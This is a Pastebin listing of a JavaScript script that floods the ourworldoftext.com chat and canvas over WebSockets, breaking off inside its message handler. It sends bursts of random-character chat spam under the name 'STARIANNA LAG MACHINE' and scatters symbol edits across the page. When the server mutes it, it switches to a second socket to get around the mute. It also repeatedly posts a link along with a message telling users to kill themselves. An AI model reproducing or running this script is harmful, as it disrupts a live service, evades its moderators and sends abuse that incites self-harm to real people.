fernozzle

Gay in Ohio

Apr 12th, 2024
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1. var socket = new WebSocket("wss://ourworldoftext.com/ws/");
  2. var socket2 = new WebSocket("wss://ourworldoftext.com/fp/ws/");
  3. var muteMessage = "";
  4. function chatSend(m, n) {
  5. socket.send(JSON.stringify({
  6. kind: "chat",
  7. message: m,
  8. location: "page",
  9. nickname: n
  10. }));
  11. }
  12.  
  13. function chatSend3(m, n) {
  14. socket.send(JSON.stringify({
  15. kind: "chat",
  16. message: m,
  17. location: "global",
  18. nickname: n
  19. }));
  20. }
  21.  
  22. function chatSend2(m, n) {
  23. socket2.send(JSON.stringify({
  24. kind: "chat",
  25. message: m,
  26. location: "page",
  27. nickname: n
  28. }));
  29. }
  30.  
  31.  
  32. var cjkSpam = "";
  33. var aaaa = -1;
  34. var aaaaa = -1;
  35. var muted = false;
  36.  
  37. function spamSymbol(e, f) {
  38. for(var i = 0; i < 50; i++) {
  39. socket.send(JSON.stringify({kind:"write",edits:[[Math.sign(Math.random()-0.5) * Math.floor(Math.random() * 13),Math.sign(Math.random()-0.5) * Math.floor(Math.random() * 13),Math.floor(Math.random() * 17),Math.floor(Math.random() * 17),"",e,"",f]]}))
  40. }
  41. }
  42.  
  43. setInterval(() => {
  44. if(!muted) {
  45. chatSend("πŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈπŸ“£βš οΈNEW LEAKED OWOT DESTROYER SCRIPT BY STARIANNA! USE IT BEFORE IT'S PATCHED AND PERMA MUTED NOW https://pastebin.com/bgy17zvF OTHERWISE KILL YOURSELF IMMEDIATELYπŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆπŸš¨πŸ‘ˆ");
  46. }
  47. }, 5000);
  48.  
  49. socket.onopen = function () {
  50. console.log("Socket has been opened successfully");
  51. }
  52.  
  53. setTimeout(() => {
  54. setInterval(() => {
  55. if(muted) {
  56. for(var i = 0; i < 400; i++) {
  57. cjkSpam += String.fromCharCode(Math.floor(Math.random() * 1000001));
  58. chatSend2(cjkSpam, "STARIANNA LAG MACHINE");
  59. cjkSpam = "";
  60. }
  61. }
  62. }, 5000);
  63. }, 5000);
  64.  
  65. setTimeout(() => {
  66. setInterval(() => {
  67. if(Math.random() < 0.25) {
  68. spamSymbol("β›š", 16711680);
  69. } else if(Math.random() > 0.25 && Math.random() < 0.5) {
  70. spamSymbol("β›š", Math.floor(Math.random() * 16777215));
  71. } else if(Math.random() > 0.5 && Math.random() < 0.75) {
  72. spamSymbol("β›š", 0);
  73. } else {
  74. spamSymbol("β›š", Math.floor(Math.random() * 16777215));
  75. }
  76. for(var i = 0; i < 400; i++) {
  77. cjkSpam += String.fromCharCode(Math.floor(Math.random() * 1000001));
  78. chatSend(cjkSpam, "STARIANNA LAG MACHINE");
  79. chatSend3(cjkSpam, "Starianna");
  80. cjkSpam = "";
  81. }
  82. }, 550);
  83. }, 2500);
  84.  
  85. socket.onmessage = function (e) {
  86. var data = JSON.parse(e.data);
  87. if (data.kind == "chat") {
  88. if(data.message.indexOf("You are temporarily muted") > -1 && data.op) {
  89. muteMessage = data.message;
  90. muted = true;
  91. }
  92. }
Add Comment
Please, Sign In to add comment